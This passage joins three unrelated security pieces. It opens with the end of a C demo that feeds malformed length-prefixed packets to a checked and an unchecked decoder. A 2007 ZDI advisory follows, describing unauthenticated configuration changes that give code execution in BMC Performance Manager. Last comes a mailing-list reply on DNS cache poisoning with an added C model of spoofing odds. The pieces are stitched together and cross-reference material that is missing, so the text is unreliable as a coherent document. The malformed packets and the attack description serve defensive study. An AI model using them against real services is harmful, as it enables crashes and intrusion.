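static const uint8_t pkt_good[]      = { 0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o', 0, 0, 0 };
static const uint8_t pkt_oversized[] = { 0, 0, 0x10, 0, 'A', 'A', 'A', 'A' };  /* claims 4096 bytes */
static const uint8_t pkt_truncated[] = { 0, 0, 0, 5, 'h', 'e' };               /* claims 5, carries 2 */

int demo_good_checked(void)
{
    char out[OPAQUE_MAX];
    int n = decode_opaque_checked(pkt_good, sizeof pkt_good, out);
    return (n == 5 && memcmp(out, "hello", 5) == 0) ? n : -1;
}
int demo_good_unchecked(void)
{
    char out[OPAQUE_MAX];
    return decode_opaque_unchecked(pkt_good, sizeof pkt_good, out);
}
int demo_oversized_checked(void)
{
    char out[OPAQUE_MAX];
    return decode_opaque_checked(pkt_oversized, sizeof pkt_oversized, out);
}
int demo_truncated_checked(void)
{
    char out[OPAQUE_MAX];
    return decode_opaque_checked(pkt_truncated, sizeof pkt_truncated, out);
}

int main(void)
{
    printf("benign, unchecked decoder:   %d\n", demo_good_unchecked());
    printf("benign, checked decoder:     %d\n", demo_good_checked());
    printf("oversized length, checked:   %d\n", demo_oversized_checked());
    printf("truncated payload, checked:  %d\n", demo_truncated_checked());
    /* The oversized packet is deliberately never fed to the unchecked
     * decoder here: that is the crash (or worse) the advisory describes. */
    return 0;
}
```

Both decoders agree on well-formed input, which is why this class of bug survives functional testing; only the checked one refuses the two malformed packets. The second check matters as much as the first: a length that fits the buffer but not the received bytes turns into an over-read of whatever follows the packet in memory.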
ZDI-07-020: BMC Performance Manager SNMP Command Execution Vulnerability
ZDI-07-020: BMC Performance Manager SNMP Command Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-020.html
April 18, 2007

-- CVE ID:
CVE-2007-1972

-- Affected Vendor:
BMC

-- Affected Products:
Performance Manager

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since April 13, 2007 by Digital Vaccine protection filter ID 5286. For further product information on the TippingPoint IPS: http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of BMC Performance Manager. User interaction is not required to exploit this vulnerability.

The specific flaw exists in PatrolAgent.exe, which listens on TCP port 3181. The service allows remote attackers to modify configuration files without authentication. An attacker can exploit this by modifying parameters in the SNMP community definitions: by changing the masterAgentName and masterAgentStartLine parameters, an attacker can execute arbitrary code.

-- Vendor Response:
BMC has provided the following statement:

[This issue] has been found not to be a security vulnerability; when properly configured (as described for our customers in our documentation and in our online knowledge base) this attack is not possible.

BMC has a formal customer support mechanism in place to provide solutions to security issues brought to us by those who have legally licensed our software. In cases where security issues are brought to my attention by individuals/vendors who do not have legal access to our products, we will investigate their merit; however, the issues will be addressed at our own discretion and according to our understanding of their severity. Finally, please note that in the future, I will only communicate resolutions and workarounds to licensed customers who are using our software legally.

For a more meaningful dialogue around these issues and to be notified of any available patches, I urge all licensed customers to use BMC's support mechanism.

-- Disclosure Timeline:
2007.03.05 - Vulnerability reported to vendor
2007.04.13 - Digital Vaccine released to TippingPoint customers
2007.04.18 - Public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
See the ZDI-07-019 advisory above; the text is identical.
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
> The attack described just now is that this vulnerability, combined with the traditional birthday attack scenario, allows another form of attack. The birthday attacks in general are still possible on any DNS server which doesn't randomize source ports, but may be more difficult to conduct than this new attack. (I'm not sure, I haven't run the numbers.)

Thank you for the clarification, Tim. That is exactly what I wanted to say. :)

By the way, as regards recent BIND 9, a birthday attack is much more difficult to conduct because even if the attacker sends multiple simultaneous recursive queries, BIND 9 aggregates these queries.

In addition, there is a patch written by Jinmei-san for BIND 9.4.0 (the current release) to randomize source ports.

http://www.jinmei.org/bind-9.4.0-portpool.patch
http://member.wide.ad.jp/tr/wide-tr-dns-bind9-portpool-01.txt (technical report from the WIDE project, in Japanese)

Makoto Shiotsuki
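The thread leaves the numbers unrun, so here they are as an added example that is not part of either message: a small model of the probability that a spoofer lands at least one forged reply on an outstanding query, for the conventional guess-the-TXID attack, the birthday variant, the birthday variant against a resolver that aggregates duplicate queries (the BIND 9 behaviour Makoto mentions), and the birthday variant against randomized source ports (the port-pool patch he links). The forged-reply budget of 1000, the 1000 duplicate queries and the 64000-port pool are assumed parameters, not measurements of any resolver, and treating each forged guess as independent is an approximation that is close enough at these sizes.

```c
/*
 * Added example, not part of the thread: it runs the numbers Tim says he
 * hasn't run. The model and all parameters (reply budget, duplicate-query
 * count, port-pool size) are assumptions, not measurements of any resolver.
 */
#include <stdio.h>

#define TXID_SPACE     65536.0  /* 16-bit DNS transaction ID */
#define PORT_POOL      64000.0  /* assumed number of randomized source ports */
#define FORGED_REPLIES 1000UL   /* assumed forged replies the attacker lands per try */
#define DUP_QUERIES    1000UL   /* assumed simultaneous queries for the same name */

/* base^n by repeated squaring; keeps the example free of libm. */
static double pow_int(double base, unsigned long n)
{
    double r = 1.0;
    while (n) {
        if (n & 1)
            r *= base;
        base *= base;
        n >>= 1;
    }
    return r;
}

/*
 * The resolver has `outstanding` queries for one name, each tagged with a
 * distinct random identifier from a space of `id_space` values (TXID alone,
 * or TXID x source port). The attacker sends `forged` replies carrying
 * distinct guessed identifiers; one hit poisons the cache. Treating each
 * guess as independent, P(no hit) = (1 - outstanding/id_space)^forged.
 */
double spoof_success(double id_space, unsigned long outstanding, unsigned long forged)
{
    if ((double)outstanding >= id_space)
        return 1.0;
    double miss_one = 1.0 - (double)outstanding / id_space;
    return 1.0 - pow_int(miss_one, forged);
}

/* Conventional attack: one outstanding query, guess its TXID. */
double p_conventional(void)
{
    return spoof_success(TXID_SPACE, 1, FORGED_REPLIES);
}

/* Birthday attack against a resolver that forwards every duplicate query
 * with its own TXID: many outstanding IDs, so a forged reply only has to
 * collide with any one of them. */
double p_birthday_no_aggregation(void)
{
    return spoof_success(TXID_SPACE, DUP_QUERIES, FORGED_REPLIES);
}

/* Same attack against a resolver that aggregates duplicate queries: only
 * one query is really outstanding, so the odds fall back to conventional. */
double p_birthday_aggregated(void)
{
    return spoof_success(TXID_SPACE, 1, FORGED_REPLIES);
}

/* Birthday attack, no aggregation, but source ports drawn from the assumed
 * pool: the identifier space grows from 2^16 to 2^16 x PORT_POOL. */
double p_birthday_port_randomized(void)
{
    return spoof_success(TXID_SPACE * PORT_POOL, DUP_QUERIES, FORGED_REPLIES);
}

int main(void)
{
    printf("conventional, TXID only:          %.6f\n", p_conventional());
    printf("birthday, no aggregation:         %.6f\n", p_birthday_no_aggregation());
    printf("birthday, duplicates aggregated:  %.6f\n", p_birthday_aggregated());
    printf("birthday, random source ports:    %.6f\n", p_birthday_port_randomized());
    return 0;
}
```

With these assumed parameters the conventional attack succeeds about 1.5% of the time per attempt, the birthday attack against a non-aggregating resolver essentially always, the same attack against an aggregating resolver only as often as the conventional one, and the birthday attack against randomized source ports well under 0.1%. Aggregation removes the birthday advantage; port randomization is what shrinks the per-attempt odds of every variant, which is why the two mitigations are complementary rather than interchangeable.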